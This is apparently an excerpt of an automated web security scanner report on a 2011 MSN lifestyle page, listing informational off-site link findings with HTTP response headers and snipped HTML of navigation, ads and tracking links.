http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=girl+scouts+cut+back+several&form=MSNS24
http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=katy+perry+rolling+stone&form=MSNS24
http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=motherhood+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=nail+colors+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=nasa+25th+challenger+anniversary&form=MSNS24
http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=sheen+leaves+hospital&form=MSNS24
http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=small+spaces+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=winter+coats+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=winter+decor+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/travel?cid=msn_lifestyle_nav
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.glamour.com/sex-love-life/2008/09/10-things-hes-thinking-when-youre-naked?mbid=synd_msn
http://www.glamour.com/sex-love-life/2009/01/his-top-10-sex-wishes-revealed?mbid=synd_msn
http://www.glamour.com/sex-love-life/2009/09/12-secret-signs-hes-into-you?mbid=synd_msn
http://www.glamour.com/sex-love-life/2010/08/15-things-men-dont-want-you-to-know-about-them?mbid=synd_msn
http://www.glamour.com/sex-love-life/2010/11/7-ways-to-convince-any-man-youre-right?mbid=synd_msn
http://www.glamourmag.com/?mbid=msn
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406203&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.redacted%2Frelationships%2Fstaticslideshowglamour.aspx%3Fcp-documentid%3D17423139%26gt1%3D32092&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://w1.buysub.com/pubs/N3/GLM/self_bbg_redbaggwp_slf-impulse.jsp?cds_page_id=47935&cds_mag_code=GLM&id=1212175010742&lsid=81511416507026799&vid=1&cds_response_key=M8ELRMSNZ&cds_mag_code=GLM
https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:50:03 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA14
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=dcd4d603a2e341fc9f7c96dced229804; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=7448EED9B6E045FB8CA4713347B1BD67; domain=.redacted; expires=Thu, 18-Aug-2011 16:50:03 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 41449

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406203&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.redacted%2Frelationships%2Fstaticslideshowglamour.aspx%3Fcp-documentid%3D17423139%26gt1%3D32092&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=nasa+25th+challenger+anniversary&form=MSNS24">challenger anniversary</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=girl+scouts+cut+back+several&form=MSNS24">girl scout cookies</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=sheen+leaves+hospital&form=MSNS24">charlie sheen</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=katy+perry+rolling+stone&form=MSNS24">katy perry</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
<div class="logo"><a href="http://www.glamourmag.com/?mbid=msn"><img src="http://blstb.redacted/i/57/CFFA9B69555B8E5C255A69F7F6A5.jpg" width="90" height="30" alt="Glamour" />
...[SNIP]...
<li class="first"><a href="http://www.glamour.com/sex-love-life/2008/09/10-things-hes-thinking-when-youre-naked?mbid=synd_msn">10 Things He's Thinking When You're Naked</a>
...[SNIP]...
<li class=""><a href="http://www.glamour.com/sex-love-life/2010/08/15-things-men-dont-want-you-to-know-about-them?mbid=synd_msn">15 Things Men Don't Want You to Know About Them</a>
...[SNIP]...
<li class=""><a href="http://www.glamour.com/sex-love-life/2010/11/7-ways-to-convince-any-man-youre-right?mbid=synd_msn">7 Ways to Convince Any Man You're Right</a>
...[SNIP]...
<li class=""><a href="http://www.glamour.com/sex-love-life/2009/01/his-top-10-sex-wishes-revealed?mbid=synd_msn">His Top 10 Sex Wishes Revealed</a>
...[SNIP]...
<li class="last"><a href="http://www.glamour.com/sex-love-life/2009/09/12-secret-signs-hes-into-you?mbid=synd_msn">12 Secret Signs He's Into You</a>
...[SNIP]...
<div class="twitter" style="width:100px;float:left"><a href="http://twitter.com/share" class="twitter-share-button" data-url="http://lifestyle.redacted/relationships/staticslideshowglamour.aspx?cp-documentid=17423139&imageindex=1&OCID=TWT">Tweet</a>
...[SNIP]...
ry', 'True','1');" href="http://lifestyle.redacted/relationships/staticslideshowglamour.aspx?cp-documentid=17423139&rrurt=1&rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
True','0');" href="http://lifestyle.redacted/relationships/staticslideshowglamour.aspx?cp-documentid=17423139&rrurt=0&rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<div class="linkedimg"><a href="https://w1.buysub.com/pubs/N3/GLM/self_bbg_redbaggwp_slf-impulse.jsp?cds_page_id=47935&cds_mag_code=GLM&id=1212175010742&lsid=81511416507026799&vid=1&cds_response_key=M8ELRMSNZ&cds_mag_code=GLM"><img src="http://blstb.redacted/i/22/248EF6C657B86F0A8D9A35C6438F.jpg" width="300" height="75" alt="Glamour" />
...[SNIP]...
<div id="seemore" class="cf" ><a href="http://www.bing.com/search?form=ALS&q=">See more results</a>
...[SNIP]...
<span class="custom3"><a href="http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&go=&form=MSN037">Valentine's Day</a></span><a href="http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.redacted&go=&form=MSN037">Winter Fashions</a><a href="http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.redacted&go=&form=MSN037">Dress Your Body</a><a href="http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=motherhood+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=ask+ying+site%3Alifestyle.redacted&form=MSN037">Ask Ying</a><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&go=&form=MSN037">Winter Boots</a>
...[SNIP]...
</a><a href="http://www.bing.com/search?q=small+spaces+site%3Alifestyle.redacted&go=&form=MSN037">Small Spaces</a><a href="http://www.bing.com/search?q=nail+colors+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.redacted&go=&form=MSN037">Curly Hairstyles</a><span class="custom2"><a href="http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.redacted&go=&form=MSN037">Men's Style</a></span><a href="http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.redacted&go=&form=MSN037">Expert Makeup Tricks</a><a href="http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.redacted&go=&form=MSN037">Quick Cleaning Tips</a><a href="http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=baby+names+site%3Alifestyle.redacted&go=&form=MSN037">Baby Names</a><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&go=&form=MSN037">Kissing</a></span></a><a href="http://www.bing.com/search?q=winter+decor+site%3Alifestyle.redacted&go=&form=MSN037">Winter Decor</a><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2"><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=winter+coats+site%3Alifestyle.redacted&go=&form=MSN037">Winter Coats</a>
...[SNIP]...
</div><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js"></script>
...[SNIP]...

22.104. http://lifestyle.redacted/your-home/room-design/staticslideshowhb.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-home/room-design/staticslideshowhb.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://lifestyle.redacted/your-home/room-design/staticslideshowhb.aspx?cp-documentid=26867784&gt1=32067

The response contains the following links to other domains:

http://ads.hearstmags.com/ams/api.js?pos_name=AMS_MSN_HOST_HBU_585X368
http://cache-01.cleanprint.net/cp/ccg?divId=2630
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.delish.com/
http://msn.delish.com/?ocid=lifestylehp
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportallifestyle.112.2o7.net/b/ss/msnportallifestyle/1/H.1--NS/0
http://twitter.com/share
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?FORM=ALS
http://www.bing.com/search?form=ALS&q=
http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=ask+ying+site%3Alifestyle.redacted&form=MSN037
http://www.bing.com/search?q=baby+names+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=girl+scouts+cut+back+several&form=MSNS24
http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=katy+perry+rolling+stone&form=MSNS24
http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=motherhood+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=nail+colors+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=nasa+25th+challenger+anniversary&form=MSNS24
http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=sheen+leaves+hospital&form=MSNS24
http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=small+spaces+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=winter+coats+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=winter+decor+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.redacted&go=&form=MSN037
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/travel?cid=msn_lifestyle_nav
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.delish.com/cooking-shows/food-tv/super-bowl-sunday-recipes-nfl
http://www.housebeautiful.com/?link=lgo&dom=msn&tpc=Home%20Improvement%2CHome%20Organizing%2CInterior%20Design%2CHome%20Improvement%20%28PM%29&src=syn&con=slide&mag=hbu
http://www.housebeautiful.com/decorating/beautiful-designer-bedrooms?link=msn%3ABeautiful%20Designer%20Bedrooms%5F6%20Things%20Your%20Date%20Secretly%20Hates%20About%20Your%20Apartment%20%28and%20How%20to%20Fix%20Them%29&dom=msn&tpc=Home%20Improvement%2CHome%20Organizing%2CInterior%20Design%2CHome%20Improvement%20%28PM%29&src=syn&con=slide&mag=hbu
http://www.housebeautiful.com/decorating/decorating-secrets?link=msn%3A20%20Decorating%20Secrets%20No%20One%20Ever%20Told%20You%5F6%20Things%20Your%20Date%20Secretly%20Hates%20About%20Your%20Apartment%20%28and%20How%20to%20Fix%20Them%29&dom=msn&tpc=Home%20Improvement%2CHome%20Organizing%2CInterior%20Design%2CHome%20Improvement%20%28PM%29&src=syn&con=slide&mag=hbu
http://www.housebeautiful.com/decorating/home-makeovers/101-makeover-ideas-0209?link=msn%3APopular%20Home%20Makeover%20Ideas%5F6%20Things%20Your%20Date%20Secretly%20Hates%20About%20Your%20Apartment%20%28and%20How%20to%20Fix%20Them%29&dom=msn&tpc=Home%20Improvement%2CHome%20Organizing%2CInterior%20Design%2CHome%20Improvement%20%28PM%29&src=syn&con=slide&mag=hbu
http://www.housebeautiful.com/kitchens/small-kitchens?link=msn%3A14%20Clever%20Tricks%20for%20Tiny%20Kitchens%5F6%20Things%20Your%20Date%20Secretly%20Hates%20About%20Your%20Apartment%20%28and%20How%20to%20Fix%20Them%29&dom=msn&tpc=Home%20Improvement%2CHome%20Organizing%2CInterior%20Design%2CHome%20Improvement%20%28PM%29&src=syn&con=slide&mag=hbu
http://www.housebeautiful.com/video/?link=msn%3ATour%20the%20Kitchen%20of%20the%20Year%5F6%20Things%20Your%20Date%20Secretly%20Hates%20About%20Your%20Apartment%20%28and%20How%20to%20Fix%20Them%29&dom=msn&tpc=Home%20Improvement%2CHome%20Organizing%2CInterior%20Design%2CHome%20Improvement%20%28PM%29&src=syn&con=slide&mag=hbu
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344849&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.redacted%2Fyour-home%2Froom-design%2Fstaticslideshowhb.aspx%3Fcp-documentid%3D26867784%26gt1%3D32067&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:29 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA13
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=2d389eb7e7ea4ae0a473db58b1a5758b; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=42164453E4924CB89C5B977561EA27D0; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:29 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 37466

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344849&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.redacted%2Fyour-home%2Froom-design%2Fstaticslideshowhb.aspx%3Fcp-documentid%3D26867784%26gt1%3D32067&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=nasa+25th+challenger+anniversary&form=MSNS24">challenger anniversary</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=girl+scouts+cut+back+several&form=MSNS24">girl scout cookies</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=sheen+leaves+hospital&form=MSNS24">charlie sheen</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=katy+perry+rolling+stone&form=MSNS24">katy perry</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li class="first"><a href="http://msn.delish.com/">Food & Entertaining</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
<div class="logo"><a href="http://www.housebeautiful.com?link=lgo&dom=msn&tpc=Home%20Improvement%2CHome%20Organizing%2CInterior%20Design%2CHome%20Improvement%20%28PM%29&src=syn&con=slide&mag=hbu"><img src="http://blstb.redacted/i/36/A314E87A94101ACD9DADF33B27E6.jpg" width="90" height="30" alt="House Beautiful" />
...[SNIP]...
<li class="first"><a href="http://www.housebeautiful.com/decorating/beautiful-designer-bedrooms?link=msn%3ABeautiful%20Designer%20Bedrooms%5F6%20Things%20Your%20Date%20Secretly%20Hates%20About%20Your%20Apartment%20%28and%20How%20to%20Fix%20Them%29&dom=msn&tpc=Home%20Improvement%2CHome%20Organizing%2CInterior%20Design%2CHome%20Improvement%20%28PM%29&src=syn&con=slide&mag=hbu">Beautiful Designer Bedrooms</a>
...[SNIP]...
<li class=""><a href="http://www.housebeautiful.com/decorating/decorating-secrets?link=msn%3A20%20Decorating%20Secrets%20No%20One%20Ever%20Told%20You%5F6%20Things%20Your%20Date%20Secretly%20Hates%20About%20Your%20Apartment%20%28and%20How%20to%20Fix%20Them%29&dom=msn&tpc=Home%20Improvement%2CHome%20Organizing%2CInterior%20Design%2CHome%20Improvement%20%28PM%29&src=syn&con=slide&mag=hbu">20 Decorating Secrets No One Ever Told You</a>
...[SNIP]...
<li class=""><a href="http://www.housebeautiful.com/decorating/home-makeovers/101-makeover-ideas-0209?link=msn%3APopular%20Home%20Makeover%20Ideas%5F6%20Things%20Your%20Date%20Secretly%20Hates%20About%20Your%20Apartment%20%28and%20How%20to%20Fix%20Them%29&dom=msn&tpc=Home%20Improvement%2CHome%20Organizing%2CInterior%20Design%2CHome%20Improvement%20%28PM%29&src=syn&con=slide&mag=hbu">Popular Home Makeover Ideas</a>
...[SNIP]...
<li class=""><a href="http://www.housebeautiful.com/kitchens/small-kitchens?link=msn%3A14%20Clever%20Tricks%20for%20Tiny%20Kitchens%5F6%20Things%20Your%20Date%20Secretly%20Hates%20About%20Your%20Apartment%20%28and%20How%20to%20Fix%20Them%29&dom=msn&tpc=Home%20Improvement%2CHome%20Organizing%2CInterior%20Design%2CHome%20Improvement%20%28PM%29&src=syn&con=slide&mag=hbu">14 Clever Tricks for Tiny Kitchens</a>
...[SNIP]...
<li class="last"><a href="http://www.housebeautiful.com/video/#v180458534001?link=msn%3ATour%20the%20Kitchen%20of%20the%20Year%5F6%20Things%20Your%20Date%20Secretly%20Hates%20About%20Your%20Apartment%20%28and%20How%20to%20Fix%20Them%29&dom=msn&tpc=Home%20Improvement%2CHome%20Organizing%2CInterior%20Design%2CHome%20Improvement%20%28PM%29&src=syn&con=slide&mag=hbu">Tour the Kitchen of the Year</a>
...[SNIP]...
<div class="twitter" style="width:100px;float:left"><a href="http://twitter.com/share" class="twitter-share-button" data-url="http://lifestyle.redacted/your-home/room-design/staticslideshowhb.aspx?cp-documentid=26867784&imageindex=1&OCID=TWT">Tweet</a>
...[SNIP]...
<li><a href="http://www.delish.com/cooking-shows/food-tv/super-bowl-sunday-recipes-nfl">NFL Mom's High-Scoring Recipes </a>
...[SNIP]...
<div class="child c1 first"><script src="http://ads.hearstmags.com/ams/api.js?pos_name=AMS_MSN_HOST_HBU_585X368" type="text/javascript"></script>
...[SNIP]...
<div id="seemore" class="cf" ><a href="http://www.bing.com/search?form=ALS&q=">See more results</a>
...[SNIP]...
<span class="custom3"><a href="http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&go=&form=MSN037">Valentine's Day</a></span><a href="http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.redacted&go=&form=MSN037">Winter Fashions</a><a href="http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.redacted&go=&form=MSN037"><span class="custom4">
...[SNIP]...
